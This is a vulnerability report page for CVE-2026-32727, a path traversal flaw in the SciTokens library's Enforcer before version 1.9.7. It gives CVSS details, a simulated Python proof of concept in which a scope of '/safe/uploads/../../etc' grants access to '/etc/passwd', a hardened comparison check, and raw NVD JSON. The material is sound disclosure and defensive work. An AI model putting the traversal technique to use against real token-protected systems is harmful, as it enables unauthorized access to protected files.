Security Vulnerability Report
CVE-2026-32727 CVSS 8.1 HIGH

CVE-2026-32727

Published: 2026-03-31 03:15:57
Last Modified: 2026-04-03 17:26:42

Description

SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.7, the Enforcer is vulnerable to a path traversal attack where an attacker can use dot-dot (..) in the scope claim of a token to escape the intended directory restriction. This occurs because the library normalizes both the authorized path (from the token) and the requested path (from the application) before comparing them using startswith. This issue has been patched in version 1.9.7.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:scitokens:scitokens_library:*:*:*:*:*:*:*:* - VULNERABLE
SciTokens < 1.9.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os

# Conceptual Proof of Concept for CVE-2026-32727
# This demonstrates how a path traversal in the scope claim can bypass
# directory restrictions. The scitokens library itself is not needed to
# run this simulation, so it is not imported.

def simulate_vulnerable_enforcer(token_scope, requested_path):
    # Simulate the vulnerable normalization logic
    # In the vulnerable version, both paths are normalized before checking
    normalized_scope = os.path.normpath(token_scope)
    normalized_request = os.path.normpath(requested_path)
    # The vulnerability lies here: checking if request starts with scope after normalization
    # If scope is ../../etc and request is /etc/passwd, check passes
    if normalized_request.startswith(normalized_scope):
        return True
    return False

# Scenario: Attacker crafts a token with a scope that escapes the intended directory
malicious_scope = "/safe/uploads/../../etc"  # Intended to restrict to /safe/uploads
requested_file = "/etc/passwd"

if simulate_vulnerable_enforcer(malicious_scope, requested_file):
    print(f"[+] EXPLOIT SUCCESSFUL: Access granted to {requested_file}")
else:
    print(f"[-] Access denied to {requested_file}")
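The description above pins the flaw on two things: the untrusted scope claim is normalized (so its ".." segments are resolved instead of rejected), and the comparison is a raw string prefix test. The following added example, which is not code from the advisory or from the SciTokens project, puts the flawed comparison beside a hypothetical defensive check (not the project's actual 1.9.7 patch) and runs both over a few constructed scope/path pairs, including a sibling-directory case that a plain prefix test also gets wrong:

```python
import posixpath

# Added example, not code from the advisory or the SciTokens project.
# Scopes and requested paths are treated as POSIX-style absolute paths,
# so posixpath is used for deterministic behaviour on every platform.


def vulnerable_prefix_check(scope_path: str, requested_path: str) -> bool:
    """The flawed comparison the advisory describes: normalize both sides,
    then a plain string prefix test.  A scope of "/safe/uploads/../../etc"
    normalizes to "/etc", so "/etc/passwd" is authorized."""
    return posixpath.normpath(requested_path).startswith(posixpath.normpath(scope_path))


def hardened_segment_check(scope_path: str, requested_path: str) -> bool:
    """Hypothetical defensive check (not the project's actual patch):
    refuse traversal segments in the untrusted scope instead of normalizing
    them away, normalize only the application-supplied path, and compare on
    path-segment boundaries rather than raw string prefixes."""
    if not scope_path.startswith("/") or not requested_path.startswith("/"):
        return False
    scope_segs = [s for s in scope_path.split("/") if s]
    if any(s in (".", "..") for s in scope_segs):
        return False  # the token may only claim its literal directory
    request_segs = [s for s in posixpath.normpath(requested_path).split("/") if s]
    # normpath on an absolute path has already resolved "." and ".." here
    return request_segs[: len(scope_segs)] == scope_segs


# Constructed test cases: (scope claim from token, path requested by application)
CASES = [
    ("/safe/uploads/../../etc", "/etc/passwd"),            # traversal in the scope claim
    ("/safe/uploads", "/safe/uploads/report.txt"),         # legitimate access
    ("/safe/uploads", "/safe/uploads2/report.txt"),        # sibling dir sharing a string prefix
    ("/safe/uploads", "/safe/uploads/../../etc/passwd"),   # traversal in the requested path
]


def compare_checks(cases=CASES):
    """Return [(scope, path, vulnerable_result, hardened_result), ...]."""
    return [(s, p, vulnerable_prefix_check(s, p), hardened_segment_check(s, p)) for s, p in cases]


if __name__ == "__main__":
    for scope, path, vuln, hard in compare_checks():
        print(f"scope={scope!r:<28} path={path!r:<36} vulnerable={vuln!s:<5} hardened={hard}")
```

Running it shows that the prefix test grants the traversal scope and the sibling directory, while the segment-based check grants only the legitimate request. The design point is that the token's scope is attacker-influenced data and should be validated, not canonicalized: normalizing it silently turns "..", which the token should never legitimately carry, into a wider authorization.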

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32727", "sourceIdentifier": "[email protected]", "published": "2026-03-31T03:15:57.340", "lastModified": "2026-04-03T17:26:41.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.7, the Enforcer is vulnerable to a path traversal attack where an attacker can use dot-dot (..) in the scope claim of a token to escape the intended directory restriction. This occurs because the library normalizes both the authorized path (from the token) and the requested path (from the application) before comparing them using startswith. This issue has been patched in version 1.9.7."}, {"lang": "es", "value": "SciTokens es una biblioteca de referencia para generar y usar SciTokens. Antes de la versión 1.9.7, el Enforcer es vulnerable a un ataque de salto de ruta donde un atacante puede usar punto-punto (..) en la declaración de alcance de un token para evadir la restricción de directorio prevista. Esto ocurre porque la biblioteca normaliza tanto la ruta autorizada (del token) como la ruta solicitada (de la aplicación) antes de compararlas usando startswith. Este problema ha sido parcheado en la versión 1.9.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:scitokens:scitokens_library:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.7", "matchCriteriaId": "8D402B23-94E7-4866-B628-DFCD1E58109E"}]}]}], "references": [{"url": "https://github.com/scitokens/scitokens/commit/2d1cc9e42bc944fe0bbc429b85d166e7156d53f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/scitokens/scitokens/pull/230", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/scitokens/scitokens/releases/tag/v1.9.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/scitokens/scitokens/security/advisories/GHSA-3x2w-63fp-3qvw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}